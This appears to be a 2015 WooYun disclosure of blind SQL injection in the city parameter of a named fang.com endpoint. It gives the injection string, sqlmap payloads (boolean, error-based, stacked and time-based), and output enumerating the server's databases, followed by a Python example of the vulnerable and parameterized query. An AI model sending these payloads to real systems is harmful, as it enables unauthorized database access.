
Boolean-based blind SQL injection on a SouFun (fang.com) sub-site

2015-09-28 15:15

http://shequ.fang.com/i/xiaoquAjax.ashx

POST request; the injection point is the city parameter.

city=bj' and len(user_name())=7 and 'aa'='aa&districtID=0&Method=GetAreaList&r=3.1415926



Manual test

When the condition is 1=1, the page returns data.

[Screenshot: sf.png]





When the condition is 1=2, the page returns nothing.

[Screenshot: sf2.png]





sqlmap run

Code:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: city (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: city=bj' AND 8290=8290 AND 'GyZG'='GyZG&districtID=0&Method=GetAreaList&r=3.14

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: city=bj' AND 1937=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (1937=1937) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(122)+CHAR(113))) AND 'abgt'='abgt&districtID=0&Method=GetAreaList&r=3.14

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: city=bj';WAITFOR DELAY '0:0:5'--&districtID=0&Method=GetAreaList&r=3.14

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: city=bj' WAITFOR DELAY '0:0:5'--&districtID=0&Method=GetAreaList&r=3.14
---
[12:50:03] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[12:50:03] [INFO] fetching database names
[12:50:03] [INFO] the SQL query used returns 3 entries
[12:50:03] [INFO] resumed: master
[12:50:03] [INFO] resumed: SheQu
[12:50:03] [INFO] resumed: tempdb
available databases [3]:
[*] master
[*] SheQu
[*] tempdb

Proof of vulnerability:

(Identical to the request, manual test and sqlmap output shown above.)

Fix:

Take it offline.
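As an added illustration (not the project's code), the handler pattern behind this report beside the parameterized form that closes it: an in-memory SQLite table stands in for the SheQu database, and the function names, table and rows are constructed. The two probes are the 1=1 / 1=2 conditions from the manual test above.

```python
import sqlite3

# Constructed stand-in for the GetAreaList lookup: a tiny in-memory table of
# districts keyed by city code. Schema and rows are made up for the example.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE area (city TEXT, districtID INTEGER, name TEXT)")
    db.executemany("INSERT INTO area VALUES (?, ?, ?)",
                   [("bj", 0, "Chaoyang"), ("bj", 1, "Haidian"), ("sh", 0, "Pudong")])
    return db

def get_area_list_vulnerable(db, city, district_id):
    # The pattern that produces the report's behaviour: the city value is
    # spliced into the SQL text, so a quote inside it closes the string
    # literal and whatever follows is parsed as SQL.
    sql = ("SELECT name FROM area WHERE city = '" + city
           + "' AND districtID = " + str(district_id))
    return [row[0] for row in db.execute(sql)]

def get_area_list_fixed(db, city, district_id):
    # Hardened form: placeholders pass the values to the driver separately
    # from the query text, so the entire city string is compared as data.
    sql = "SELECT name FROM area WHERE city = ? AND districtID = ?"
    return [row[0] for row in db.execute(sql, (city, district_id))]

# The two probes from the manual test: a quote to end the literal, the
# injected condition, and a re-balanced quote so the statement still parses.
TRUE_PROBE = "bj' and 1=1 and 'aa'='aa"
FALSE_PROBE = "bj' and 1=2 and 'aa'='aa"

def boolean_oracle_differs(handler, db):
    # Defender's regression check: if the true and false probes produce
    # different responses, the endpoint acts as a boolean-blind oracle.
    return handler(db, TRUE_PROBE, 0) != handler(db, FALSE_PROBE, 0)
```

With the vulnerable handler the true probe returns the Chaoyang row and the false probe returns nothing; with the parameterized handler both return nothing, because no city is literally named "bj' and 1=1 and 'aa'='aa".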

Source: www.wooyun.org/bugs/wooyun-2015-0133833
